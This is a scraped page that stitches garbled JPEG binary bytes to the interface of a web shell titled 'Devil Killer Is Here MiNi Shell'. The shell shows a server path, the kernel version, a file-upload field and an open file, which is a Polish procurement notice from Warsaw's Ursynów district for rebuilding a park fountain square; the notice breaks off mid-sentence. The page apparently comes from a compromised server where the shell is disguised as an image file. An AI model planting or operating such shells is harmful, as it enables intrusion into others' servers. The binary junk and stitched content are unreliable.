JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220923/0036225701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa/modernizacja placu z fontanną w Parku im. Jana Pawła II – w celu zwiększenia zieleni na terenie obiektu, wraz z pielęgnacją roślin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA DZIELNICA URSYNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525964000138</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Komisji Edukacji Narodowej 61</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-777</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 443 73 33</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ursynow.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ursynow.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa/modernizacja placu z fontanną w Parku im. Jana Pawła II – w celu zwiększenia zieleni na terenie obiektu, wraz z pielęgnacją roślin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-72045776-3a5d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00362257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016469/33/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.23 Przebudowa/modernizacja placu z fontanną w Parku im. Jana Pawla II w roku 2022 - w celu zwiększenia zieleni na terenie obiektu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem https://zamowienia.um.warszawa.pl zwanej dalej Platformą lub Systemem. <br/>2)	Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania na Platformie, zgodnie z poniższą kolejnością. <br/>3)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy na Platformie następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. W uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej. <br/>4)	Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>•	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>•	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>•	Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>•	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5)	Dopuszczalne wielkości i formaty przesyłanych danych<br/>•	Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>•	Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>6)	Kodowanie i czas odbioru danych<br/>•	Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>•	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje pkt 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">81/WZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamierzenia budowlanego jest przebudowa placu z fontanną w Parku im. Jana Pawła II w Warszawie w celu zwiększenie stopnia zazielenienia placu i wymiany małej architektury na nowoczesne i wygodne wzornictwo. <br/>Przebudowa placu w Parku im. Jana Pawła II jest inicjatywą Dzielnicy Ursynów, mającą na celu poprawę warunków wzrostu dla istniejącej zieleni na placu oraz podwyższenie jakości życia mieszkańców w warunkach kryzysu klimatycznego. <br/>Przebudowa placu w Parku im. Jana Pawła II zostanie zrealizowana w trzech etapach. <br/>Zakres :<br/>I. Część I inwestycji – Etap I A i B inwestycji (Zamówienie podstawowe): <br/>Etap I A inwestycji - od dnia zawarcia umowy do 15.12.2022 r. (w zakresie poz. 1-59 przedmiaru robot); będzie miał na celu:<br/>•	zwiększenie stopnia zazielenienia placu, poprzez utworzenie nowych rabat wokół fontanny oraz przy południowo-wschodniej pierzei placu,<br/>•	poprawę warunków wzrostu drzew rosnących na placu, poprzez wbudowanie podłoża strukturalnego w rejonie nowych rabat,<br/>•	wymianę części małej architektury na nowoczesne i wygodne wzornictwo. <br/>Etap I A inwestycji wiązać się będzie z wykonaniem następującego zakresu robót na działce ewid. nr 10/42 z obrębu 11008:<br/>•	zabezpieczenie drzew na czas budowy, <br/>•	prace pomiarowe,<br/>•	demontaż istniejących stołów, stojaków rowerowych oraz części ławek i koszy na odpady,<br/>•	demontaż zabezpieczeń istniejących drzew (niskie stalowe wygrodzenia, wys. ok 50 cm), <br/>•	wyniesienie z działki betonowo-drewnianych koszy na odpadki (niezwiązanych z podłożem),<br/>•	przeniesienie głazu narzutowego i biblioteki plenerowej (na nowe miejsca na placu)<br/>•	tymczasowa rozbiórka fragmentów nawierzchni z kostki granitowej i kostki betonowej, wbudowanie pod podbudowę zasadniczą substratu strukturalnego (mieszanka tłucznia i ziemi urodzajnej) oraz odtworzenie nawierzchni, <br/>•	rozbiórka fragmentów nawierzchni z kostki granitowej i kostki betonowej oraz obrzeży betonowych, wykończenie brzegów nawierzchni listwami stalowymi oraz wymiana podłoża na ziemię urodzajną,<br/>•	przesadzenie krzewów oraz odmłodzenie krzewów i drzew,<br/>•	wykonanie nasadzeń roślinnych: drzew, krzewów, bylin, traw ozdobnych i roślin cebulowych,<br/>•	wykończenie rabat z nasadzeniami roślinnymi (ściółkowanie),<br/>•	montaż nowych elementów małej architektury: ławki, stoły, kosze na odpady, stojaki rowerowe.<br/>Etap I B inwestycji - Zamówienie podstawowe.<br/>•	pielęgnacja posadzonego materiału roślinnego na okres 24 miesięcy. <br/>II. Część II inwestycji stanowiącą prawo opcji: <br/>a)	Opcja 1-Etapu II inwestycji;<br/>a.a) Etap II A, <br/>a.b) Etap II B;<br/>b)	Opcja 2 Etapu III inwestycji. <br/>Zamawiający przewiduje możliwość zlecenia opcji. W ramach prawa opcji do wykonania będą następujące elementy:<br/>Opcja 1, Etap II A inwestycji będzie miał na celu:<br/>•	poprawę warunków wzrostu drzew rosnących na placu, poprzez powiększenie mis przy istniejących drzewach,<br/>•	wymianę małej architektury na nowoczesne i wygodne wzornictwo. <br/>Etap II A inwestycji wiązać się będzie z wykonaniem następującego zakresu robót na działce ewid. nr 10/42 z obrębu 11008:<br/>•	zabezpieczenie drzew na czas budowy, <br/>•	prace pomiarowe,<br/>•	demontaż istniejących ławek, koszy na odpady,<br/>•	demontaż zabezpieczeń istniejących drzew (niskie stalowe wygrodzenia, wys. ok 50 cm), <br/>•	wyniesienie z działki betonowo-drewnianych koszy na odpadki (niezwiązanych z podłożem)<br/>•	rozbiórka fragmentów nawierzchni z kostki granitowej oraz obrzeży betonowych w rejonie istniejących drzew, wykończenie brzegów nawierzchni listwami stalowymi oraz wymiana podłoża na ziemię urodzajną,<br/>•	przesadzenie krzewów oraz odmłodzenie krzewów i drzew <br/>•	wykonanie nasadzeń roślinnych z krzewów<br/>•	wykończenie rabat z nasadzeniami roślinnymi (ściółkowanie),<br/>•	montaż nowych elementów małej architektury: ławki i kosze na odpady.<br/>Etap II B inwestycji wiązać się będzie z wykonaniem następującego zakresu robót:<br/>•	pielęgnacja posadzonego materiału roślinnego na okres 24 miesięcy<br/>Opcja 2, Etap III inwestycji będzie miał na celu:<br/>•	poprawę warunków wzrostu drzew rosnących na placu, poprzez wbudowanie podłoża strukturalnego pod dwie główne aleje wzdłuż szpalerów lip po obu stronach placu. <br/>Etap III inwestycji wiązać się będzie z wykonaniem następującego zakresu robót na działce ewid. nr 10/42 z obrębu 11008:<br/>•	prace pomiarowe,<br/>•	tymczasowa rozbiórka fragmentów nawierzchni z kostki granitowej o łącznej powierzchni ok 409 m2, wbudowanie pod podbudowę zasadniczą substratu strukturalnego (mieszanka tłucznia i ziemi urodzajnej) oraz odtworzenie nawierzchni.<br/>Etapowanie inwestycji przedstawiono w przetargowej dokumentacji projektowej na rysunkach:<br/>•	PL_PDP_03-W_07_A3_Mala-arch_etapowanie<br/>•	PL_PDP_01-W_01_420-590_Rozbiórki_etapowanie<br/>•	PL_PDP_02-W_03_420-590_Zielen_etapowanie<br/>Obowiązki wynikające z klauzuli społecznej<br/>1.	Zamawiający w przedmiotowym postępowaniu stosuje klauzulę społeczną na podstawie art. 95 ust. 1 ustawy Pzp. <br/>2.	Szczegółowy opis obowiązków wynikających z klauzuli społecznej znajduje się w projektowanych postanowieniach umowy – załącznik nr 3 do SWZ. <br/>Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SWZ, stanowiący jednocześnie załącznik do projektowanych postanowień umowy oraz:<br/>1)	Projektowane postanowienia umowy stanowiące załącznik nr 3 do SWZ;<br/>2)	Dokumentacja projektowa - stanowiąca załącznik nr 6 do SWZ<br/>3)	Przedmiar robót stanowiący załącznik nr 7a do SWZ dla Części I<br/>4)	Przedmiar robót stanowiący załącznik nr 7b do SWZ dla Części II (Opcji 1)<br/>5)	Przedmiar robót stanowiący załącznik nr 7c do SWZ dla Części III (Opcji 2<br/>6)	Specyfikacja Techniczna Wykonania i Odbioru Robót, stanowiąca załącznik nr 8 do SWZ, będąca jednocześnie załącznikiem do projektowanych postanowień umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Część II inwestycji stanowiącą prawo opcji: <br/>a)	Opcja 1-Etapu II inwestycji;<br/>a.a) Etap II A, <br/>a.b) Etap II B;<br/>b)	Opcja 2 Etapu III inwestycji. <br/>Zamawiający przewiduje możliwość zlecenia opcji. W ramach prawa opcji do wykonania będą następujące elementy:<br/>Opcja 1, Etap II A inwestycji będzie miał na celu:<br/>•	poprawę warunków wzrostu drzew rosnących na placu, poprzez powiększenie mis przy istniejących drzewach,<br/>•	wymianę małej architektury na nowoczesne i wygodne wzornictwo. <br/>Etap II A inwestycji wiązać się będzie z wykonaniem następującego zakresu robót na działce ewid. nr 10/42 z obrębu 11008:<br/>•	zabezpieczenie drzew na czas budowy, <br/>•	prace pomiarowe,<br/>•	demontaż istniejących ławek, koszy na odpady,<br/>•	demontaż zabezpieczeń istniejących drzew (niskie stalowe wygrodzenia, wys. ok 50 cm), <br/>•	wyniesienie z działki betonowo-drewnianych koszy na odpadki (niezwiązanych z podłożem)<br/>•	rozbiórka fragmentów nawierzchni z kostki granitowej oraz obrzeży betonowych w rejonie istniejących drzew, wykończenie brzegów nawierzchni listwami stalowymi oraz wymiana podłoża na ziemię urodzajną,<br/>•	przesadzenie krzewów oraz odmłodzenie krzewów i drzew <br/>•	wykonanie nasadzeń roślinnych z krzewów<br/>•	wykończenie rabat z nasadzeniami roślinnymi (ściółkowanie),<br/>•	montaż nowych elementów małej architektury: ławki i kosze na odpady.<br/>Etap II B inwestycji wiązać się będzie z wykonaniem następującego zakresu robót:<br/>•	pielęgnacja posadzonego materiału roślinnego na okres 24 miesięcy<br/>Opcja 2, Etap III inwestycji będzie miał na celu:<br/>•	poprawę warunków wzrostu drzew rosnących na placu, poprzez wbudowanie podłoża strukturalnego pod dwie główne aleje wzdłuż szpalerów lip po obu stronach placu. <br/>Etap III inwestycji wiązać się będzie z wykonaniem następującego zakresu robót na działce ewid. nr 10/42 z obrębu 11008:<br/>•	prace pomiarowe,<br/>•	tymczasowa rozbiórka fragmentów nawierzchni z kostki granitowej o łącznej powierzchni ok 409 m2, wbudowanie pod podbudowę zasadniczą substratu strukturalnego (mieszanka tłucznia i ziemi urodzajnej) oraz odtworzenie nawierzchni.<br/><br/>Zgodnie z postanowieniami umowy <br/>1.	Zamawiający przewiduje możliwość skorzystania w okresie obowiązywania Umowy z prawa opcji, zgodnie z którym Zamawiający może zlecić Wykonawcy za dodatkowym wynagrodzeniem: <br/>a)	wykonanie wszystkich prac opisanych jako OPCJA 1 (Etap II A inwestycji ) i OPCJA 2 (Etap III inwestycji ) w opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do Umowy;<br/>b)	wykonanie wszystkich albo niektórych prac opisanych jako OPCJA 1 (Etap II B inwestycji ) w opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do Umowy.<br/>2.	Realizacja : (uruchomienie) prawa opcji dokonywana jest poprzez złożenie Wykonawcy przez Zamawiającego w okresie obowiązywania umowy pisemnego oświadczenia określającego zakres opcji. Realizacja (uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia)<br/>nie stanowi zmiany warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy. Przedmiotowe prawo opcji może być realizowane przez Zamawiającego etapowo / częściowo /fragmentarycznie / sukcesywnie w okresie realizacji zamówienia, przy czym oświadczenie o skorzystaniu przez Zamawiającego z prawa opcji (ewentualnie ostatnie z takich oświadczeń – w przypadku etapowego korzystania z prawa opcji) może zostać złożone najpóźniej do dnia 31.08.2023 r. Po upływie tego terminu zastrzeżone prawo opcji (w zakresie, w jakim nie zostało uruchomione) wygasa, w związku z czym Zamawiający po upływie tego terminu nie może już z niego skorzystać. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">8)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1 w związku z art. 214 pkt 7) ustawy Prawo zamówień publicznych o wartości netto do kwoty 263 086,51 złotych netto. Zamówienia podobne będą polegały na powtórzeniu prac objętych zamówieniem podstawowym tj.:<br/>• tymczasowej rozbiórce fragmentów nawierzchni z kostki granitowej i kostki betonowej, wbudowaniu pod podbudowę zasadniczą substratu strukturalnego (mieszanka tłucznia i ziemi urodzajnej) oraz odtworzeniu nawierzchni, <br/>• rozbiórce fragmentów nawierzchni z kostki granitowej i kostki betonowej oraz obrzeży betonowych, wykończeniu brzegów nawierzchni listwami stalowymi oraz wymianie podłoża na ziemię urodzajną (budowa mis pod roślinność),<br/>• przesadzeniu krzewów oraz odmłodzeniu istniejących krzewów i drzew,<br/>• wykonaniu nasadzeń roślinnych: drzew, krzewów, bylin, traw ozdobnych i roślin cebulowych,<br/>• wykończeniu rabat z nasadzeniami roślinnymi (ściółkowanie),<br/>• demontażu zużytych oraz montażu nowych elementów małej architektury: ławki, stoły, kosze na odpady, stojaki rowerowe,<br/>• pielęgnacji posadzonego materiału roślinnego.<br/>Zamówienia podobne zostaną udzielone pod warunkiem, że Zamawiający będzie posiadał środki finansowe.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceny ofert będzie dokonywała Komisja przetargowa. <br/>W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria przypisując mu odpowiednią wagę procentową:<br/>I kryterium: „cena brutto” – waga 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki w zakresie zdolności technicznej lub zawodowej:<br/>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że:<br/>1)	w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonali¹ (tj. zakończyli) minimum 1 robotę budowalną polegającą na budowie/przebudowie/modernizacji/remoncie placu zabaw2, skweru3 lub parku4 o powierzchni nie mniejszej niż 2000 m².<br/>Uwaga!<br/>¹ Za wykonaną robotę Zamawiający uzna taką robotę, której przedmiot został odebrany przez Zamawiającego jako wykonany w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.<br/>2 Plac Zabaw - wydzielone miejsce (często ogrodzone), przeznaczone do zabawy dla dzieci, wyposażone w urządzenia do zabawy typu piaskownica, zjeżdżalnia, huśtawka i in.<br/>3 Skwer - jest terenem zieleni z trawnikami, klombami, krzewami oraz drzewami, a niekiedy znajdują się tam fontanny, alejki, ławki i inny sprzęt 